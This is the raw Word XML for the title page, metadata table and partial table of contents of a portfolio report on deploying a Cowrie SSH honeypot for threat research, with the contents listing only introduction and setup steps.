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5E091" w14:textId="77777777" w:rsidR="0062444D" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="1440" w:after="200"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1F3864"/>
          <w:sz w:val="56"/>
          <w:szCs w:val="56"/>
        </w:rPr>
        <w:t>DECEPTION TECHNOLOGY</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6434EA53" w14:textId="77777777" w:rsidR="0062444D" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="200"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2E75B6"/>
          <w:sz w:val="56"/>
          <w:szCs w:val="56"/>
        </w:rPr>
        <w:t>&amp; HONEYPOT NETWORK PROJECT</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D0E4F36" w14:textId="77777777" w:rsidR="0062444D" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="8" w:space="0" w:color="2E75B6"/>
        </w:pBdr>
        <w:spacing w:after="600"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:color w:val="555555"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">Threat Research </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:color w:val="555555"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>Report  |</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:color w:val="555555"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">  Cowrie SSH Honeypot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6AFEA0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901BB63" w14:textId="77777777" w:rsidR="0062444D" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Document 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7E869B" w14:textId="77777777" w:rsidR="0062444D" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Deception Technology &amp; Honeypot Network Project</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0062444D" w14:paraId="6F6EDA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557B7EF" w14:textId="77777777" w:rsidR="0062444D" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>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381447" w14:textId="77777777" w:rsidR="0062444D" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>2.0 — Cowrie Edition</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0062444D" w14:paraId="7ED226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BEAAB8" w14:textId="77777777" w:rsidR="0062444D" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>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A818F4" w14:textId="77777777" w:rsidR="0062444D" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Portfolio / Professional Reference</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0062444D" w14:paraId="6699BB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2572FB" w14:textId="77777777" w:rsidR="0062444D" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>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B9024B" w14:textId="77777777" w:rsidR="0062444D" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Moses Isemin</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0062444D" w14:paraId="2682F6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2B8500A" w14:textId="77777777" w:rsidR="0062444D" w:rsidRDefault="00000000">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E36ABE" w14:textId="77777777" w:rsidR="0062444D" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>06/06/2026</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0062444D" w14:paraId="60BB66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934BA06" w14:textId="77777777" w:rsidR="0062444D" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Simulates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D12669" w14:textId="77777777" w:rsidR="0062444D" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Deception Technology Specialist / SOC Analyst Workflow</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0062444D" w14:paraId="52AEA7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061E770" w14:textId="77777777" w:rsidR="0062444D" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Honeypot Tool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F867B1" w14:textId="77777777" w:rsidR="0062444D" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Cowrie SSH Honeypot (Lightweight — No Docker Required)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0062444D" w14:paraId="6B4851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4A7417" w14:textId="77777777" w:rsidR="0062444D" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Deployment Period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5440D6" w14:textId="77777777" w:rsidR="0062444D" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>May – June 2026</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="506E2362" w14:textId="77777777" w:rsidR="0062444D" w:rsidRDefault="00000000">
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C503C3F" w14:textId="77777777" w:rsidR="0062444D" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:bookmarkStart w:id="0" w:name="_Toc231686534"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Table of Contents</w:t>
      </w:r>
      <w:bookmarkEnd w:id="0"/>
    </w:p>
    <w:p w14:paraId="1D2407F8" w14:textId="77777777" w:rsidR="0062444D" w:rsidRDefault="0062444D"/>
    <w:sdt>
      <w:sdtPr>
        <w:alias w:val="Table of Contents"/>
        <w:id w:val="-394815965"/>
      </w:sdtPr>
      <w:sdtContent>
        <w:p w14:paraId="0A5268B9" w14:textId="77777777" w:rsidR="009F18E8" w:rsidRDefault="00000000">
          <w:pPr>
            <w:pStyle w:val="TOC1"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9710"/>
            </w:tabs>
            <w:rPr>
              <w:noProof/>
            </w:rPr>
          </w:pPr>
          <w:r>
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r>
            <w:instrText>TOC \h \o "1-3"</w:instrText>
          </w:r>
          <w:r>
            <w:fldChar w:fldCharType="separate"/>
          </w:r>
          <w:hyperlink w:anchor="_Toc231686534" w:history="1">
            <w:r w:rsidR="009F18E8">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Table of Contents</w:t>
            </w:r>
            <w:r w:rsidR="009F18E8">
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="009F18E8">
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="009F18E8">
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc231686534 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="009F18E8">
              <w:rPr>
                <w:noProof/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="009F18E8">
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="009F18E8">
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t>2</w:t>
            </w:r>
            <w:r w:rsidR="009F18E8">
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="16883A75" w14:textId="77777777" w:rsidR="009F18E8" w:rsidRDefault="009F18E8">
          <w:pPr>
            <w:pStyle w:val="TOC1"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9710"/>
            </w:tabs>
            <w:rPr>
              <w:noProof/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc231686535" w:history="1">
            <w:r>
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>1. Introduction</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc231686535 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t>4</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="0337454B" w14:textId="77777777" w:rsidR="009F18E8" w:rsidRDefault="009F18E8">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9710"/>
            </w:tabs>
            <w:rPr>
              <w:noProof/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc231686536" w:history="1">
            <w:r>
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>1.1  Project Objectives</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc231686536 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t>4</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="7A69F6DB" w14:textId="77777777" w:rsidR="009F18E8" w:rsidRDefault="009F18E8">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9710"/>
            </w:tabs>
            <w:rPr>
              <w:noProof/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc231686537" w:history="1">
            <w:r>
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>1.2  Statement of Problem</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc231686537 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t>5</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="4E301AA2" w14:textId="77777777" w:rsidR="009F18E8" w:rsidRDefault="009F18E8">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9710"/>
            </w:tabs>
            <w:rPr>
              <w:noProof/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc231686538" w:history="1">
            <w:r>
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>1.3  How This Project Addresses the Problem</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc231686538 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t>5</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="267A98FD" w14:textId="77777777" w:rsidR="009F18E8" w:rsidRDefault="009F18E8">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9710"/>
            </w:tabs>
            <w:rPr>
              <w:noProof/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc231686539" w:history="1">
            <w:r>
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>1.4  System Requirements</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc231686539 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t>6</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="484BD71C" w14:textId="77777777" w:rsidR="009F18E8" w:rsidRDefault="009F18E8">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9710"/>
            </w:tabs>
            <w:rPr>
              <w:noProof/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc231686540" w:history="1">
            <w:r>
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>1.5  Tools Used</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc231686540 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t>6</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="208825AA" w14:textId="77777777" w:rsidR="009F18E8" w:rsidRDefault="009F18E8">
          <w:pPr>
            <w:pStyle w:val="TOC1"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9710"/>
            </w:tabs>
            <w:rPr>
              <w:noProof/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc231686541" w:history="1">
            <w:r>
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>2. Environment Setup &amp; Honeypot Deployment</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc231686541 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t>7</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="2219B217" w14:textId="77777777" w:rsidR="009F18E8" w:rsidRDefault="009F18E8">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9710"/>
            </w:tabs>
            <w:rPr>
              <w:noProof/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc231686542" w:history="1">
            <w:r>
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>2.1  Create the Ubuntu VM</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc231686542 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t>7</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="4ED1F332" w14:textId="77777777" w:rsidR="009F18E8" w:rsidRDefault="009F18E8">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9710"/>
            </w:tabs>
            <w:rPr>
              <w:noProof/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc231686543" w:history="1">
            <w:r>
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Step 1 — Install VirtualBox and Create the VM</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc231686543 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t>7</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="676BB302" w14:textId="77777777" w:rsidR="009F18E8" w:rsidRDefault="009F18E8">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9710"/>
            </w:tabs>
            <w:rPr>
              <w:noProof/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc231686544" w:history="1">
            <w:r>
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Step 2 — Update Ubuntu After Installation</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc231686544 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t>8</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="29BF3882" w14:textId="77777777" w:rsidR="009F18E8" w:rsidRDefault="009F18E8">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9710"/>
            </w:tabs>
            <w:rPr>
              <w:noProof/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc231686545" w:history="1">
            <w:r>
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Step 3 — Install Cowrie Dependencies</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc231686545 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t>8</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="27E79278" w14:textId="77777777" w:rsidR="009F18E8" w:rsidRDefault="009F18E8">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9710"/>
            </w:tabs>
            <w:rPr>
              <w:noProof/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc231686546" w:history="1">
            <w:r>
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Step 4 — Create a Dedicated User for Cowrie</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc231686546 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t>8</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="79EAC4C1" w14:textId="77777777" w:rsidR="009F18E8" w:rsidRDefault="009F18E8">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9710"/>
            </w:tabs>
            <w:rPr>
              <w:noProof/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc231686547" w:history="1">
            <w:r>
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Step 5 — Download and Install Cowrie</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc231686547 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t>9</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="3E8B2509" w14:textId="77777777" w:rsidR="009F18E8" w:rsidRDefault="009F18E8">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9710"/>
            </w:tabs>
            <w:rPr>
              <w:noProof/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc231686548" w:history="1">
            <w:r>
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Step 6 — Configure Cowrie</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc231686548 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t>9</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="7B18AD19" w14:textId="77777777" w:rsidR="009F18E8" w:rsidRDefault="009F18E8">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9710"/>
            </w:tabs>
            <w:rPr>
              <w:noProof/>
            </w:rPr>
          </w:pPr>
